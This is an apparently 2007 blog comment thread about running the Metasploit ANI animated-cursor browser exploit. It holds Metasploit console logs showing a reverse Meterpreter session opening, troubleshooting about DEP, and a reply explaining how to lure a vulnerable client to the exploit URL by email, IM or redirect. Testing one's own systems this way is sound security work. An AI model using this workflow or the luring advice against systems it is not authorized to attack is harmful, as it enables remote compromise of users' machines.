tag:blogger.com,1999:blog-25010298.post8579865338563467902..comments2008-09-25T11:27:02.425-07:00hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-25010298.post-39568186975152257442007-08-07T17:48:00.000-07:002007-08-07T17:48:00.000-07:00<B>Hi All!</B><BR/><BR/>>> exploit<BR/><BR/><BR/>[*] Started reverse handler<BR/>[*] Using URL: http://127.0.0.1:8080/rdDlcXdsSyGT8<BR/>[*] Server started.<BR/>[*] Exploit running as background job.<BR/><BR/>Right... But when I open the site http://127.0.0.1:8080/rdDlcXdsSyGT8 it shows this:<BR/><BR/>cfGcGjSpnXllY74XY99NLpDvD2AW0dxvyLwOye76cis955nRySFvGAodD<BR/>ou7L3IFbiGv3u80ThISHjjTvxx3EFWVxSyhQWxaEcXi0Ao2nPHr35q2yrFC2JU5NUCOrGuJrGf93o5WVc779HLfY6caI7TuyUNzYYk5T3nAnmkoth<BR/>fREL0UMmEzKw8Rx2<BR/>qt5Y4a9MHLNczGhmgCxMwwRa7UXJYJgqV3qi0UCiZ4G7oEgmlcpvuis5t156CMkSpSlpDDFrBRCV171JaUciT<BR/>EvOn5WP6tdT7UZ1AuhDDCBe7oY4b2MA8WGdjf8nvQI7F<BR/>f90UDdlU4PnqY2mE9faMTubdScViHF9WD9FRlA43kkjcWjYU4KirZxnF0Z1R73oi3tgEouERP7uVLVqRu6wm2z0HfDvybCNOA<BR/>TsPabJulmDU9EakIIDvg0IllkFhr<BR/>qyXunebqGViQppZqheGSFxCzeh4c74ExeigRWR1G847JBOu5zpAm6w3AANvXgQVZEd5Kk6yhbZ7h7nUc<BR/>PBvZeLgK0uZjdGYrArQA15Ij7x4SwhG3Z5ZeN9ZJriKSXmqkbLgifwDS93BdPtK9LVHQaVT2WwvHnN888VGpbSqAVQyYJGoK9z1O<BR/>FfE52I4DRjyxnCwF2MzDGdThJQOEYqaZjKlG6n7kmjO2cSOSxHCa7uXbEikL6aMBIxXYyoXRRYf5TupGMK<BR/><BR/>and don't open the download of the .ani archive...<BR/><BR/><B>Anyone know why? :(</B><BR/><BR/>Thanks.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-92217110482932885622007-04-21T16:48:00.000-07:002007-04-21T16:48:00.000-07:00nice job HD, but why is reverse_tcp not working unlike bind_tcp?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-45902154746625374852007-04-11T01:28:00.000-07:002007-04-11T01:28:00.000-07:00>> exploit<BR/>[*] Started reverse handler<BR/>[*] Using URL: http://192.168.1.103:8080/rdDlyGT8<BR/>[*] Server started.<BR/>[*] Exploit running as background job.<BR/>[*] Transmitting intermediate stager for over-sized stage...(89 bytes)<BR/>[*] Sending stage (2834 bytes)<BR/>[*] Sleeping before handling stage...<BR/>[*] Uploading DLL (73739 bytes)...<BR/>[*] Upload completed.<BR/>[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.103:4050)<BR/><BR/><BR/>>> sessions -i 1<BR/>[*] Starting interaction with 1...<BR/><BR/>(running)<BR/><BR/>>> help<BR/>? Help menu<BR/>channel Displays information about active channels<BR/>close Closes a channel<BR/>exit Terminate the meterpreter session<BR/>help Help menu<BR/>interact Interacts with a channel<BR/>irb Drop into irb scripting mode<BR/>migrate Migrate the server to another process<BR/>quit Terminate the meterpreter session<BR/>read Reads data from a channel<BR/>run Executes a meterpreter script<BR/>use Load a one or more meterpreter extensions<BR/>write Writes data to a channel<BR/>>><BR/>>> use stdapi<BR/>Loading extension stdapi...<BR/>[-] failure: No such file or directory - C:/Program Files/Metasploit/Framework3/framework/data/meterpreter/ext_server_-m.dll ./script/../config/../config/../../../lib/rex/post/meterpreter/client_core.rb:86:in `initialize' ./script/../config/../config/../../../lib/rex/post/meterpreter/client_core.rb:86:in `open' ./script/../config/../config/../../../lib/rex/post/meterpreter/client_core.rb:86:in `load_library' ./script/../config/../config/../../../lib/rex/post/meterpreter/client_core.rb:156:in `use' ./script/../config/../config/../../../lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:249:in `cmd_use' ./script/../config/../config/../../../lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in `each' ./script/../config/../config/../../../lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:237:in `cmd_use' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `send' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `run_command' ./script/../config/../config/../../../lib/rex/post/meterpreter/ui/console.rb:94:in `run_command' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `each' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single' ./script/../config/../config/../../../lib/rex/post/meterpreter/ui/console.rb:60:in `interact' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/shell.rb:121:in `call' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/shell.rb:121:in `run' ./script/../config/../config/../../../lib/rex/post/meterpreter/ui/console.rb:58:in `interact' ./script/../config/../config/../../../lib/msf/base/sessions/meterpreter.rb:170:in `_interact' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/interactive.rb:48:in `interact' ./script/../config/../config/../../../lib/msf/ui/console/command_dispatcher/core.rb:671:in `cmd_sessions' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `send' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `run_command' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `each' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single' C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/shell.rb:125:in `run' ./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `initialize' ./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `new' ./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `initialize' ./script/../config/../config/../../../lib/msf/ui/web/driver.rb:62:in `new' ./script/../config/../config/../../../lib/msf/ui/web/driver.rb:62:in `create_console' ./script/../config/../app/controllers/exploits_controller.rb:56:in `config' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:1095:in `send' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:1095:in `perform_action_without_filters' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:632:in `call_filter' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:619:in `perform_action_without_benchmark' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/benchmarking.rb:66:in `perform_action_without_rescue' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/benchmark.rb:293:in `measure' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/benchmarking.rb:66:in `perform_action_without_rescue' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/rescue.rb:83:in `perform_action' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:430:in `send' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:430:in `process_without_filters' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/filters.rb:624:in `process_without_session_management_support' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/session_management.rb:114:in `process' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:330:in `process' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/dispatcher.rb:41:in `dispatch' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:113:in `handle_dispatch' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:79:in `service' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/httpserver.rb:104:in `service' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/httpserver.rb:65:in `run' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:162:in `start' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:95:in `start' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:92:in `each' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:92:in `start' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:23:in `start' C:/Program Files/Metasploit/Framework3/lib/ruby/1.8/webrick/server.rb:82:in `start' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/webrick_server.rb:63:in `dispatch' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/commands/servers/webrick.rb:59 C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require' C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `require' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:495:in `require' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:342:in `new_constants_in' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/activesupport-1.4.1/lib/active_support/dependencies.rb:495:in `require' C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/rails-1.2.2/lib/commands/server.rb:39 C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `gem_original_require' C:/Program Files/Metasploit/Framework3/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:27:in `require' ./script/server:3 C:/Program Files/Metasploit/Framework3/framework/msfweb:82:in `load' C:/Program Files/Metasploit/Framework3/framework/msfweb:82<BR/><BR/>Everything starts out fine. Once I issue the "use stdapi" command, it doesn't load successfully. I get a failure notice. I'm using the windows/browser/ani_imageload_chunksize sploit. Payload = windows/meterpreter/reverse_tcp.<BR/><BR/><BR/>I'm just wondering why whenever I run the command "use stdapi" to start the library, I get a failure notice. Anyone know why I'm getting this? I get the same notice on BT2 and Windows.<BR/><BR/>Sorry for the long post. I'm just really stumped with this.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-74784170502355319602007-04-07T01:38:00.000-07:002007-04-07T01:38:00.000-07:00Thanks for your answer I didn't made clear that I was checking my own system to see how vulnerable it was. So I took the link and open it with Firefox and IE but nothing happens.<BR/><BR/>Also I was playing with a poc that said it defeated the DEP and it worked, but it was written to call the system func and call whatever command we wanted with it.<BR/><BR/>I tried to make it run shellcode but after creating my file and accesing it via the explorer window a screen appears saying tha DEP detected some code trying to be run from memory. <BR/><BR/>So I think that is why the ani metasploit module didn't worked.<BR/><BR/>Regards,<BR/>CircuitAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-37251492104668841732007-04-07T00:25:00.000-07:002007-04-07T00:25:00.000-07:00Once the exploit starts the listening web server, its *your* job to get a vulnerable client to connect to that web server and request the URL. Make sure you metasploit system is accessible to the victim and send them a link through whatever method is easiest (redirect from a web site, email, IM, etc).hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-28896698826188740252007-04-06T22:59:00.000-07:002007-04-06T22:59:00.000-07:00I tried the ANI HTTP exploit to see if my machine is vulnerable but it just stays in the following screen forever without changing anything.<BR/><BR/>msf exploit(ani_loadimage_chunksize) > exploit<BR/>[*] Started reverse handler<BR/>[*] Using URL: http://my_ip:8080/foo<BR/>[*] Server started.<BR/>[*] Exploit running as background job.<BR/>msf exploit(ani_loadimage_chunksize) ><BR/><BR/>Im testing it in a WinXP Pro Version 2002 with SP2 installed.<BR/>I also tried with netcat listening on the remote port I configured the exploit for but it just stays listening there forever.<BR/><BR/>Maybe I have the DEP enabled and thats why it isnt working. How can I know if I have DEP enabled?<BR/><BR/>Regards,<BR/>CircuitAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-49960470163358188752007-04-05T07:00:00.000-07:002007-04-05T07:00:00.000-07:00Hello All,<BR/><BR/>Thanks for the response HD...I realized after, that I missed adding a word which probably would have changed your response. Instead of saying "the command prompt stays the same & does display the following)" I meant to say " & does NOT display the following". In anycase, we did end up getting this to work, as it seemed that after doing a few updates in MSF 3 that some later iterations of the exploit did work. I just wanted to say Thanks for the great work that you do...the ease as to how we can test this, so we can proactively work towards a solution, is a great asset to the industry.<BR/><BR/>Regards<BR/>Rex69Rex69noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-83351593187665622822007-04-03T08:40:00.000-07:002007-04-03T08:40:00.000-07:00That "session 1 opened" message means that the exploit worked and a session was created. Use the "sessions -l" command to list active sessions and "sessions -i ID" to interact with them. Congratulations, it worked :-)hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-22493334531033199202007-04-03T07:54:00.000-07:002007-04-03T07:54:00.000-07:00Hi there...We've been trying to use the ANI HTTP exploit in our test lab at work, but seem to be having an issue with getting this to work. Right now when we lauch the exploit, we get to this point:<BR/><BR/>msf exploit(ani_loadimage_chunksize) > exploit<BR/>[*] Started reverse handler<BR/>[*] Using URL: http://10.4.4.1:8080/foo<BR/>[*] Server started.<BR/>[*] Exploit running as background job. <BR/>msf exploit(ani_loadimage_chunksize) ><BR/><BR/>We then try to connect our victim PC to the HTTP link provided, but nothing seems to be happening on the attacker PC (i.e. the command prompt stays the same & does display the following)<BR/><BR/>[*] Transmitting intermediate stager for over-sized stage...(89 bytes)<BR/>[*] Sending stage (2834 bytes)<BR/>[*] Sleeping before handling stage...<BR/>[*] Uploading DLL (73739 bytes)...<BR/>[*] Upload completed.<BR/>[*] Meterpreter session 1 opened (10.4.4.1:4444 -> 10.4.4.2:49310)<BR/><BR/>We've tried many ways to get this work, but we may be missing something...So if anyone is able to shed a bit more light on this that would be greatly appreciated.<BR/><BR/>Regards<BR/>Rex69rex69noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-25324200394294196802007-04-02T10:21:00.000-07:002007-04-02T10:21:00.000-07:00The default Hardware DEP setting is "OptIn" which only protects Windows Explorer.exe. If your system supports hardware DEP (NX or XD cpu bit enabled), it will prevent exploitation inside explorer but not inside IE or the other vectors. Changing it to AlwaysOn or OptOut will protect against the other vectors.<BR/><BR/>Keep in mind that DEP can be bypassed, but not extremely trivially. Good luck.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-80308378761451752912007-04-02T08:18:00.000-07:002007-04-02T08:18:00.000-07:00If DEP is enabled for all processes, I believe that the exploit is blocked in its current form. You can grab the new ANI exploits by using the 'Online Update' feature in the Windows version of the framework and 'svn update' in the Unix version.hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-159855794355457282007-04-02T08:09:00.000-07:002007-04-02T08:09:00.000-07:00Where I can download this exploit for metasploit?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-55655998413666422052007-04-02T05:37:00.000-07:002007-04-02T05:37:00.000-07:00Does DEP work against this exploit or doesn't it? You write that DEP is disabled for Explorer but what if the user actually has enabled DEP?Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-76862697989577598442007-04-02T00:46:00.000-07:002007-04-02T00:46:00.000-07:00Cool !! :) <BR/><BR/>At the time I release the exploit, I have no Vista test base, so I did not look for the way to make code execution on Vista. However, after I read your posts, I think heap spraying technique that I use in XP SP2 version "may be" also used to exploit this vulnerability on Vista too - does not confirmed, but I will test it.Trirat Puttaraksahttp://www.blogger.com/profile/05733396334545897735noreply@blogger.com